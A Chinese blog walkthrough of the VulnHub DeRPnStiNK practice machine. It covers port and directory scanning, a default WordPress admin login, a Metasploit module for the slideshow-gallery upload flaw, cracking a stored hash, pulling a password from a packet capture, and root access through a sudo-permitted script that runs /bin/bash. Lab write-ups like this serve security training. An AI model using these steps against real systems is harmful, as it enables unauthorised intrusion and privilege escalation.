Vulnhub靶场篇:VulnHub2018_DeRPnStiNK

最新推荐文章于 2024-02-21 21:00:05 发布
最新推荐文章于 2024-02-21 21:00:05 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 靶场渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44740377/article/details/106097285
版权

此篇博客写到一半离开两个小时就全丢了(草稿没有给文章设置分类专栏等等之前根本没法保存)只好重新写了一遍,这可能是我花费时间最长的一篇博客了(因为菜),因为探索了多种解法,此文只用其中的一种。

靶场难度:中下难度

VMWARE虚拟机下搭建环境:

攻击机kali IP:192.168.223.136  

攻击机win10:本机

靶   机IP:192.168.223.147

首先进行信息收集:

nmap -sS -sV -T4 -A -p- 192.168.223.147

 可以看到其开放了FTP、SSH、HTTP服务;打开其web页面:

 此页面没什么可点击的,F12查看源码:

 得到flag1;我们继续搜寻,在head标签下看到此文件目录: 

打开此目录看到:

 stinky,确保用本地dns更新你的主机文件,这样就可以在新的derpnstink博客上线前访问它

 那我们就乖乖把etc目录下hosts添加上192.168.223.147 derpnstink.local

 通过dirb扫描目录:

 看得到这是一个wordpress框架;打开dirb扫描出的目录:http://derpnstink.local/weblog/wp-admin/

用默认用户名密码admin:admin登陆成功;看到admin界面:

 

 没多少功能此管理员,但是有一个上传文件的功能;可以上传木马远控靶机;但此篇文章我们用插件漏洞获取权限:

wpscan --url 'http://derpnstink.local/weblog/'

 扫描得到:

可以看到插件slideshow-gallery版本较原始,有漏洞可以利用:

use exploit/unix/webapp/wp_slideshowgallery_upload

 配置相关参数:

优化终端: 

python -c 'import pty;pty.spawn("/bin/bash")'

 在wp-config.php中找到MySQL用户名与密码root:mysql

 登录之前扫描出的phpmyadmin路径:http://192.168.223.147/php/phpmyadmin

 在表wp_posts下找到flag2

 另外在wp_users表下找到用户unclestinky:

 看到unclestinky的密码是加密的;

我们此处可以用hashcat或者John the ripper工具来解密此密文,此处使用John:

 得到密码:wedgie57

登录此账号:

有之前看到过得一个flag和一些上传点;我们暂且不管;

在kali机登录用户unclestinky,却失败了,我们把用户名换成stinky再试,登陆成功,并且在此用户桌面拿到了flag:

此时猜测flag4肯定在mrderp用户的文件里,但是现在没有权限进入

此时我们继续在stinky用户目录下信息搜集;在documents文件夹下发现一个derpissues.pcap文件。

在/ftp/files/network-logs路径下找到derpissues.txt

stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay

将 derpissues.pcap 复制到 ftp 的根目录以便于下载 :

cp derpissues.pcap /home/stinky/ftp/files

直接ftp://192.168.223.147登录,下载流量文件:

wireshark打开分析:

过滤并查找关键字段得到密码:derpderpderpderpderpderpderp

此时我们可以切换用户为mrderp:

stinky@DeRPnStiNK:/$ su mrderp
password:
mrderp@DeRPnStiNK:/$

在mrderp用户的文件夹中找到helpdesk.log。
内容中有一个网址https://pastebin.com/rzk9wfgw

查看我们现在有哪些权限:

提示mrderp只有在/binaries/路径下文件名有derpy的文件可以使用sudo命令。
在这个目录创建derpy.sh并在里面写下/bin/bash。

mrderp@DeRPnStiNK:~/binaries$ echo "/bin/bash" >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
/bin/bash

更改它的权限,并sudo执行,成功提权到root用户。

mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ ls
derpy.sh  derpysu
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# ls

在/root/desktop路径下找到最后一个flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
 
Congrats on rooting my first VulnOS!
 
Hit me up on twitter and let me know your thoughts!
 
@securekomodo

这只是这个靶场的一种解法。祝读者有所收获

夜车星繁
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
vulnhub靶场之Deathnote
最新发布
qq_58091216的博客
02-21 1044
现在我们知道用户名,不知道密码,我们前面扫描到robots.txt,有一个提示说在important.jpg添加了提示,那么我们就在网站图片上面找。发现了文件的路径获得密码字典,那么肯定是有用的,我们想到22端口是开放的,我们可以试试爆破ssh。首先,我们进入fake-notebook-rule,发现了2个文件,一个是加密的数字,一个是提示。我们查看根目录下的内容,发现了user.txt文件,我们进行查看。我们可以看到登录成功,我们进行查看,看有没有可以利用的地方。
vulnhub靶机corrosion1
weixin_52450702的博客
11-18 585
vulnhub靶机corrosion1
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场为xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在MONEYBOX:1靶场中,攻击准备和信息收集是非常重要的步骤。可以使用Kali中的工具如netdiscover来发现目标主机,使用nmap进行端口扫描和版本检测,使用dirb进行目录扫描等。 安装VulnHub靶场MONEYBOX:1需要先下载安装包,然后解压并在虚拟机中打开。在安装过程中,需要配置网络和端口转发等设置,以便在本地环境中运行虚拟机并连接到靶场。 总之,VulnHub靶场MONEYBOX:1是一个非常实用的学习资源,可以帮助安全爱好者提高渗透测试和漏洞利用的技能。但是需要注意的是,靶场环境仅供学习和研究使用,不得用于非法入侵和攻击他人系统。
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 808
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
【甄选靶场Vulnhub百个项目渗透——项目七:DerpNStink-1(sql注入,流量分析)
人间体佐菲的博客
08-23 2038
【专为新人甄选】Vulnhub百个项目渗透——项目七:DerpNStink-1
VulnHub2018_DeRPnStiNK靶机总结
qq_45301512的博客
01-16 738
靶机下载地址:dl=0打开靶机,使用nmap扫描出靶机的ip和开放的所有端口可以看到,靶机开放了21端口,22端口和80端口遇到ftp的21端,我们先尝试ftp匿名登录,用户名anonymous,密码为空,发现无法ftp匿名登录那么我们然后先根据80端口打开网站,从网站入手,不行的话,在考虑ssh的爆破打开网站,并没有发现什么功能点,可以进行漏洞利用,那么开始信息收集,目录爆破一下使用dirb扫描出来,经过查看,发现一个新的网页。
VULNHUB-DERPNSTINK: 1-靶机渗透
weixin_52374319的博客
05-13 731
VULNHUB-DERPNSTINK: 1-靶机渗透 靶机难度:中等(CTF) 靶场地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali攻击机ip:192.168.43.135 信息收集 arp-scan -l #扫描靶机ip 端口扫描 nmap -sC -sV -T4 192.168.43.73 可以看到21,22,80端口开放 访问80端口,呆呆二人组。。。。。 好干净的页面,看一下源代码找到第一个flag dirb目录爆破一
VulnHun实战——DerpNStink:1
m0_63200360的博客
05-22 314
扫描站点漏洞:wpscan --url http://derpnstink.local/weblog/ --api-token HyETL1kAFHUZersgVa8wZnb2ysXXswzJTL2uaQG4fVw。设置获取IP方式为NAT,然后扫描NAT 所在的网段:nmap -sn 192.168.27.0/24。扫描靶机网站目录:dirb http://192.168.27.148/扫描靶机端口开启哪些端口:nmap -p- 192.168.27.148。192.168.27.148为靶机IP。
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
vulnhub -- Nagini(难度--medium)
weixin_46107179的博客
05-07 539
靶机下载地址:下载链接 主机发现 还是同样的方法arp-scan -l来发现主机ip 信息搜集 得到靶机ip之后,通过nmap扫描进行信息搜集,得知开放22,80端口以及相关版本服务 通过80端口,打开网站发现,该网站只有一张图片 通过查看源码也没有什么发现,接下来用gobuster进行路径扫描,发现了两个路径(/joomla和/note.txt) Joomla是一个CMS框架系统,再次对Joomla目录进行扫描,发现得到很多目录,但是基本上没有可用信息,只有一个后台登录页面看能不能进行突破 接着
No.1-VulnHub-GoldenEye-1渗透学习
meng_mo_jue_ying的博客
03-18 3514
VulnHub-GoldenEye-1渗透学习 一、前言 靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 难度:中级 目标:获取root权限,并获取到flag 二、信息收集 1.获取攻击目标 使用nmap或者netdiscover扫描网段信息,获取攻击目标 # nmap扫描网段 nmap -sP 192.168.88.0/24 # netdiscover扫描网段 netdiscover -r 192.168.88.0/24 扫描到攻击目标:192.
No.8-VulnHub-IMF: 1-Walkthrough渗透学习
qq_34801745的博客
01-06 2618
** VulnHub-IMF: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志...
Vulnhub】之Nagini
zg_111的博客
04-13 1329
根据之前得到的bak配置文件,我们知道服务器启用了Mysql数据库,并且用户名为goblin,密码为空,接下来我们可以使用gopher协议查询Joomla的后台管理员账密,从而登陆至Web后台进行下一步操作。在hermoine用户文件夹下,我们发现了隐藏的文件夹.mozilla,该文件夹是在linux操作系统中使用firefox浏览器后,在当前用户的目录下就会生成给.mozilla目录,进入该文件夹,可以发现当前浏览器中的安装的扩展包、配置信息及包括浏览器登录某些web应用后记录下的用户名和密码信息。
vulnhub靶场VulnHub2018_DeRPnStiNK靶机提权
qq_46421742的博客
07-27 153
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
Vulnhub靶机的下载和使用
laoyanCZ的博客
11-26 744
一、何为Virtualbox? ​​​​​Virtualbox跟Vmware一样,是创建虚拟机的软件,两者的功能基本上是一样的。 那我们为什么要安装Virtualbox呢?因为Vulnhub上面的靶机在导入到Virtualbox会稳定一些,基本上不会出现什么兼容性的问题,而导入到Vmware可能会报一些错误,就导致我们无法正常导入,所以我们一般都用Virtualbox来打开Vulnhub上的靶机。二、博主的渗透环境 博主一般都是习惯于kali安装在Vmware里面,
一次在vulnhub上下载靶场的渗透练习
hcufo的博客
09-25 147
下载好通过管理——————导入虚拟电脑——一直下一步就行了。安装好后开始主机探测,使用namp或者arp-scan等。只有一个介绍页面,那试试爆破路径,看看有没有后台啥的。到这个用户下查看,有文本,查看一下有flag了‘’表面没看出什么,用string查看有没有影藏内容。由于lily的秘钥和remu一样,那登录尝试。查到到相应版本到漏洞数据库网站上面去查找。只扫描到一个页面,查看源代码看看有提示。如报错,右击设置关闭USB设备控制器。做不走了,开始访问web页面看看提示。用工具分析,需要密码。
vulnhub靶场 planets
08-28
vulnhub靶场"planets"是一个信息搜集与利用的主机发现的靶场。你可以在找到更多关于该靶场的详细信息。 根据辐射测年估计和其他证据,地球形成于45亿年前。在地球历史的最初10亿年里,生命出现在海洋中,并开始影响...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值